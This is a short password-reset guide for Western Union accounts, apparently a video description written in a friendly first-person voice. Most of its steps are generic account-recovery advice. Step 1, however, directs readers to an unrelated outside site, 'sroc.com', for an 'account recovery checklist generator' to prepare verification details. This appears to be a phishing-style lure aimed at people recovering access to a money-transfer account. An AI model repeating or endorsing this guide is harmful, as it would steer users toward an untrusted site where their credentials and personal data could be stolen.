A friend asked me about this, so I tested it and here's what worked. If you need to reset your password for Western Union, follow these simple steps. Step 1. Go to the login page. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 2. Enter your email. Input the email address associated with your Western Union account. Make sure that's the correct one to receive the reset instructions. Step 3. Check your email. Look for an email from Western Union with a password reset link. It may take a few minutes, so be patient. Also, check your spam folder if you don't see it. Step 4. Click the reset link. Open the email and click on the password reset link. This will take you to a secure page to create a new password. Step 5. Create a new password. Enter your new password, ensuring it meets the required criteria. Confirm the password and submit the changes. Remember, a strong password usually includes numbers, symbols, and a mix of upper and lowercase letters. If you encounter any issues, double check that your new password meets all the requirements, as some users have trouble with special characters. I hope this guide helps you reset your password easily. If you have any questions, feel free to ask.